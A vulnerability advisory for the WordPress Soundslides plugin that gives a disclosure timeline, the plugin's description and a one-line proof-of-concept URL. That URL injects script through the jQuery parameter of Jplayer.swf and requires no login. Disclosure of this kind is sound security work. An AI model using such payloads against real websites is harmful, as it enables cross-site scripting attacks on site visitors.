wp-plugin : soundslides

Plugin Details
Plugin Name: wp-plugin : soundslides
Effected Version : (and most probably lower version's if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

127.0.0.1/wordpress/wp-content/wp-plugs/soundslides/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337dayTUNISIAN CYBER/)//


Disclosure Timeline
Vendor Contacted : 2013-12-26
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[| This plugin allows easier integration of a Soundslides project into your WordPress website or blog. Upload a zip file of your project and then add the project to your post as you would an image or video. Soundslides is a software product that helps build audio slideshows from a collection of images and an audio file. Soundslides makes creating elegant slideshows a snap. Soundslides can help create very customized simple slideshows including controlled Ken Burns pans and zooms plus many other effects. The final project can be easily posted to your website or converted to video. Soundslides projects are regularly featured on the NY Times and The Guardian and many other major newspaper websites. ]